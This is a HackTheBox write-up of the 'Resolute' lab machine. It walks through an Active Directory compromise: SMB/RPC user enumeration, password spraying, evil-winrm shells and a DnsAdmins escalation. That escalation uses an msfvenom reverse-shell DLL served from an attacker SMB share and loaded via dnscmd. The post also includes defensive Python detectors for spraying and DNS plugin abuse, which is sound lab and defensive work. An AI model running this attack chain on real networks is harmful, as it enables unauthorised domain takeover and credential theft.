[HackTheBox] Resolute

Penetration/HackTheBox

by obscurity_ 2024. 11. 3. 19:47


 

53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
 

 

Judging by the open ports, the server appears to be a domain controller.

53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-30 09:11:33Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?                                                              
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped                                                             
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found                                                                 
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Host script results:                                                                    
| smb-security-mode:   
|   account_used: <blank>                  
|   authentication_level: user                                                          
|   challenge_response: supported                                                       
|_  message_signing: required                                                           
| smb-os-discovery:                                                                     
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute                                                             
|   NetBIOS computer name: RESOLUTE\x00                                                 
|   Domain name: megabank.local                                                         
|   Forest name: megabank.local                                                         
|   FQDN: Resolute.megabank.local
|_  System time: 2024-10-30T02:12:23-07:00                                              
|_clock-skew: mean: 2h14m33s, deviation: 4h02m30s, median: -5m27s                       
| smb2-security-mode: 
|   3:1:1:           
|_    Message signing enabled and required
| smb2-time:                  
|   date: 2024-10-30T09:12:24    
|_  start_date: 2024-10-30T06:31:34
 

The detailed scan also yielded the FQDN and the domain name.

Add this information to the hosts file and resolv.conf.

Anonymous login to SMB was possible, so I checked the user list with the --users flag, and the user list is printed.

 

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u '' -p '' --users 
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\: 
SMB         10.10.10.169    445    RESOLUTE         -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.10.169    445    RESOLUTE         Administrator                 2024-10-30 09:15:02 0       Built-in account for administering the computer/domain 
SMB         10.10.10.169    445    RESOLUTE         Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.10.10.169    445    RESOLUTE         krbtgt                        2019-09-25 13:29:12 0       Key Distribution Center Service Account 
SMB         10.10.10.169    445    RESOLUTE         DefaultAccount                <never>             0       A user account managed by the system. 
SMB         10.10.10.169    445    RESOLUTE         ryan                          2024-10-30 09:15:02 0        
SMB         10.10.10.169    445    RESOLUTE         marko                         2019-09-27 13:17:14 0       Account created. Password set to Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         sunita                        2019-12-03 21:26:29 0        
SMB         10.10.10.169    445    RESOLUTE         abigail                       2019-12-03 21:27:30 0        
SMB         10.10.10.169    445    RESOLUTE         marcus                        2019-12-03 21:27:59 0        
SMB         10.10.10.169    445    RESOLUTE         sally                         2019-12-03 21:28:29 0        
SMB         10.10.10.169    445    RESOLUTE         fred                          2019-12-03 21:29:01 0        
SMB         10.10.10.169    445    RESOLUTE         angela                        2019-12-03 21:29:43 0        
SMB         10.10.10.169    445    RESOLUTE         felicia                       2019-12-03 21:30:53 0        
SMB         10.10.10.169    445    RESOLUTE         gustavo                       2019-12-03 21:31:42 0        
SMB         10.10.10.169    445    RESOLUTE         ulf                           2019-12-03 21:32:19 0        
SMB         10.10.10.169    445    RESOLUTE         stevie                        2019-12-03 21:33:13 0        
SMB         10.10.10.169    445    RESOLUTE         claire                        2019-12-03 21:33:44 0        
SMB         10.10.10.169    445    RESOLUTE         paulo                         2019-12-03 21:34:46 0        
SMB         10.10.10.169    445    RESOLUTE         steve                         2019-12-03 21:35:25 0        
SMB         10.10.10.169    445    RESOLUTE         annette                       2019-12-03 21:36:55 0        
SMB         10.10.10.169    445    RESOLUTE         annika                        2019-12-03 21:37:23 0        
SMB         10.10.10.169    445    RESOLUTE         per                           2019-12-03 21:38:12 0        
SMB         10.10.10.169    445    RESOLUTE         claude                        2019-12-03 21:39:56 0        
SMB         10.10.10.169    445    RESOLUTE         melanie                       2024-10-30 09:15:02 0        
SMB         10.10.10.169    445    RESOLUTE         zach                          2019-12-04 10:39:27 0        
SMB         10.10.10.169    445    RESOLUTE         simon                         2019-12-04 10:39:58 0        
SMB         10.10.10.169    445    RESOLUTE         naoki                         2019-12-04 10:40:44 0 
 

 

Save these names to SMBUsers.txt as a plain one-username-per-line list for spraying.

I then tried AS-REP roasting, but no user is vulnerable.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-GetNPUsers megabank.local/'' -usersfile SMBUsers.txt -dc-ip 10.10.10.169           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
 

 

Meanwhile, after binding anonymously to MSRPC and sending queries, we turn out to have permission to run them.

Anonymous binding and queries seem to be allowed on MSRPC.

 

┌──(root㉿kali)-[~/Pentest/Machine]
└─# rpcclient -U "" -N megabank.local  
rpcclient $> querydominfo
Domain:         MEGABANK
Server:
Comment:
Total Users:    79
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
 

 

Checking user details with querydispinfo, the account marko carries a description saying its password was set to Welcome123! when the account was created.

 

rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)
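The Desc: leak above and the AS-REP check earlier both come down to reading user attributes. As an added example that is not part of the original post, this Python script parses rpcclient querydispinfo output, decodes the acb: bits (MS-SAMR account-control flags, including the 0x10000 bit that GetNPUsers tests for) and flags accounts whose description looks like it holds a password; the sample records are copied from the output above, and the keyword list is an assumption.

```python
import re
from dataclasses import dataclass

# MS-SAMR USER_ACCOUNT control bits, as shown in rpcclient's "acb:" column.
ACB_FLAGS = {
    0x00001: "DISABLED",
    0x00004: "PASSWORD_NOT_REQUIRED",
    0x00010: "NORMAL_ACCOUNT",
    0x00200: "DONT_EXPIRE_PASSWORD",
    0x00400: "AUTO_LOCKED",
    0x10000: "DONT_REQUIRE_PREAUTH",   # the bit AS-REP roasting depends on
}

# Words in a Desc: field that deserve a closer look (assumed list).
SECRET_HINTS = ("password", "passwd", "pwd", "welcome")

LINE_RE = re.compile(
    r"^index:\s+0x[0-9a-f]+\s+RID:\s+(?P<rid>0x[0-9a-f]+)\s+acb:\s+(?P<acb>0x[0-9a-f]+)"
    r"\s+Account:\s+(?P<account>\S+)\s+Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)

@dataclass
class Account:
    name: str
    rid: int
    acb: int
    full_name: str
    desc: str

    def flags(self):
        return [label for bit, label in ACB_FLAGS.items() if self.acb & bit]

def parse_dispinfo(text):
    """Parse the 'index: ... Desc: ...' records printed by rpcclient querydispinfo."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue   # prompts, blank lines, anything that is not a record
        accounts.append(Account(m["account"], int(m["rid"], 16), int(m["acb"], 16),
                                m["name"].strip(), m["desc"].strip()))
    return accounts

def audit(accounts):
    """Return {account: [issue, ...]} for accounts a defender should follow up."""
    findings = {}
    for a in accounts:
        issues = []
        if a.desc != "(null)" and any(h in a.desc.lower() for h in SECRET_HINTS):
            issues.append("description may contain a password")
        if a.acb & 0x10000:
            issues.append("Kerberos preauth not required (AS-REP roastable)")
        if a.acb & 0x00004:
            issues.append("password not required")
        if a.acb & 0x00200 and not a.acb & 0x00001:
            issues.append("password never expires")
        if issues:
            findings[a.name] = issues
    return findings

# Sample records copied from the querydispinfo output above.
SAMPLE = """\
rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
"""

if __name__ == "__main__":
    for name, issues in audit(parse_dispinfo(SAMPLE)).items():
        print(f"{name}: {'; '.join(issues)}")
```

The disabled built-ins (acb bit 0x1 set on Guest, krbtgt and DefaultAccount) are also the three accounts for which GetNPUsers printed KDC_ERR_CLIENT_REVOKED above.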
 

 

So we spray Welcome123! against the account list in SMBUsers.txt from earlier to see whether any user logs in with it.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u SMBUsers.txt -p 'Welcome123!' --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE 
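Seen from the domain controller, the spray above is one source address failing against many distinct accounts within a short window, with a single success at the end. As an added example (not from the original post), this Python detector applies exactly that rule to constructed logon records; the record shape, the threshold and the window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # how long one spraying burst may span (assumed)
THRESHOLD = 5                    # distinct accounts failing from one source (assumed)

# Constructed sample records (not from the original page), shaped like the fields a
# SIEM keeps from Security events 4625 (failed logon) and 4624 (successful logon):
# (timestamp, event id, source address, target account).
SPRAYED = ["Administrator", "ryan", "marko", "sunita", "abigail", "marcus",
           "sally", "fred", "angela", "felicia", "gustavo", "ulf"]
LOGONS = [(f"2024-10-30T09:20:{i:02d}", 4625, "10.10.14.21", u) for i, u in enumerate(SPRAYED)]
LOGONS += [
    ("2024-10-30T09:20:12", 4624, "10.10.14.21", "melanie"),   # the one hit of the spray
    ("2024-10-30T10:05:00", 4625, "10.10.20.7", "paulo"),      # a single typo, then success
    ("2024-10-30T10:05:30", 4624, "10.10.20.7", "paulo"),
]

def detect_spray(records, threshold=THRESHOLD, window=WINDOW):
    """One alert per source that fails against >= threshold distinct accounts in a window,
    listing any account that logged on successfully from that source inside the window."""
    by_src = defaultdict(list)
    for ts, eid, src, user in records:
        by_src[src].append((datetime.fromisoformat(ts), eid, user))
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e[0])
        fails = [(t, u) for t, e, u in evs if e == 4625]
        for i, (t0, _) in enumerate(fails):
            tried = {u for t, u in fails[i:] if t <= t0 + window}
            if len(tried) < threshold:
                continue
            hits = sorted({u for t, e, u in evs if e == 4624 and t0 <= t <= t0 + window})
            alerts.append({"source": src, "first_seen": t0.isoformat(),
                           "accounts_tried": len(tried), "accounts_compromised": hits})
            break   # one alert per source is enough for this illustration
    return alerts

if __name__ == "__main__":
    for alert in detect_spray(LOGONS):
        print(alert)
```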
 

 

The login succeeds for the melanie account with that password.

nxc confirms that melanie is a Remote Management user, so a shell as melanie can be obtained through evil-winrm.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u melanie -p 'Welcome123!'     
WINRM       10.10.10.169    5985   RESOLUTE         [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u melanie -p Welcome123!                      
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
 

 

As always, after initial access I first check privileges and groups, then looked for PowerShell history files; a hidden PowerShell transcript turns up (the file carries the hidden attribute, hence -Force in the search).

 

*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter "*PowerShell*.txt"


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
 

 

Read that transcript, redirect it into ps.txt, and download it to the Kali machine.

*Evil-WinRM* PS C:\Users\melanie\Documents> cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt > ps.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> download ps.txt
                                        
Info: Downloading C:\Users\melanie\Documents\ps.txt to ps.txt
                                        
Info: Download successful!
 

In the transcript there is an attempt to connect to SMB as the ryan account, with the password hard-coded in it.

 

ryan : Serv3r4Admin4cc123!

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u ryan -p 'Serv3r4Admin4cc123!'             
WINRM       10.10.10.169    5985   RESOLUTE         [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u ryan -p 'Serv3r4Admin4cc123!'               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
 

The ryan account we obtained is also a Remote Management User, so the WinRM connection succeeds.

Ryan additionally belongs to the DnsAdmins group.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

 

DnsAdmins is the group that can manage the DNS service. A member of this group can change the DNS service's plugin DLL path, upload a malicious DLL, and restart the DNS service, which yields SYSTEM privileges.

See the post below for details.

https://blog.naver.com/diary_yw/223627869663

 

First, use msfvenom to build the malicious DLL.

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f dll > rev.dll
 

Then start an SMB server so the DLL can be fetched from it.

impacket-smbserver share -smb2support . 
 

Since port 4444 was specified when building the payload with msfvenom, open port 4444 with nc.

nc -lvnp 4444
 

 

Finally, on the server, point the DNS plugin DLL setting at the Kali SMB share path and restart the DNS service with sc.exe; that is all.

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.21\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 644
        FLAGS 
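From the defensive side, the sequence above is a change to the ServerLevelPluginDll value (dnscmd writes it under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters) followed by a DNS service restart. As an added example that is not part of the original post, this Python detector scores such changes over constructed process-creation and registry events; the event shape, the user names other than ryan and the 30-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the original page), shaped like Sysmon
# Event ID 1 (process creation) and 13 (registry value set) after field extraction.
EVENTS = [
    {"ts": "2019-12-03T06:40:01", "kind": "process", "user": "MEGABANK\\ryan",
     "cmd": r"dnscmd /config /serverlevelplugindll \\10.10.14.21\share\rev.dll"},
    {"ts": "2019-12-03T06:40:01", "kind": "registry", "user": "MEGABANK\\ryan",
     "target": r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
     "details": r"\\10.10.14.21\share\rev.dll"},
    {"ts": "2019-12-03T06:40:20", "kind": "process", "user": "MEGABANK\\ryan", "cmd": "sc.exe stop dns"},
    {"ts": "2019-12-03T06:40:25", "kind": "process", "user": "MEGABANK\\ryan", "cmd": "sc.exe start dns"},
    {"ts": "2019-12-03T08:15:00", "kind": "process", "user": "MEGABANK\\dnsops",
     "cmd": "dnscmd /zoneadd corp.megabank.local /primary"},   # routine DNS admin work
    {"ts": "2019-12-03T09:00:00", "kind": "process", "user": "MEGABANK\\svc_patch", "cmd": "net stop dns"},
]

PLUGIN_CMD_RE = re.compile(r"\bdnscmd(?:\.exe)?\b.*?/config\s+/serverlevelplugindll\s*(?P<path>\S*)", re.I)
PLUGIN_VALUE = r"\services\dns\parameters\serverlevelplugindll"   # compared lower-cased
DNS_RESTART_RE = re.compile(r"\b(?:sc(?:\.exe)?|net)\s+(?:stop|start)\s+dns\b|\brestart-service\s+dns\b", re.I)
RESTART_WINDOW = timedelta(minutes=30)

def plugin_changes(events):
    """Yield (event, new_value) for every event that sets ServerLevelPluginDll."""
    for ev in events:
        if ev["kind"] == "process":
            m = PLUGIN_CMD_RE.search(ev["cmd"])
            if m:
                yield ev, m["path"]
        elif ev["kind"] == "registry" and ev["target"].lower().endswith(PLUGIN_VALUE):
            yield ev, ev["details"]

def detect(events):
    """Score each plugin-DLL change; a UNC path and a DNS restart soon after raise severity."""
    restarts = [datetime.fromisoformat(ev["ts"]) for ev in events
                if ev["kind"] == "process" and DNS_RESTART_RE.search(ev["cmd"])]
    findings = []
    for ev, path in plugin_changes(events):
        t0 = datetime.fromisoformat(ev["ts"])
        restarted = any(t0 <= t <= t0 + RESTART_WINDOW for t in restarts)
        if path == "":
            severity = "info"       # value cleared: this is how the setting is remediated
        elif path.startswith("\\\\"):
            severity = "high"       # DLL would be loaded from a remote share
        else:
            severity = "medium"
        if restarted and severity != "info":
            severity = "critical"   # change plus restart: the DLL has most likely been loaded
        findings.append({"ts": ev["ts"], "user": ev["user"], "via": ev["kind"],
                         "path": path, "severity": severity, "dns_restarted": restarted})
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The registry-set event is the more reliable of the two signals, since it fires however the value was changed, while the command-line match depends on process auditing with command lines enabled.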
 

 

When the service is restarted this way, it connects to the Kali SMB server that was already listening and fetches the DLL file.

That connection is recorded in the Kali terminal.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share -smb2support .                                                       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,57920)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
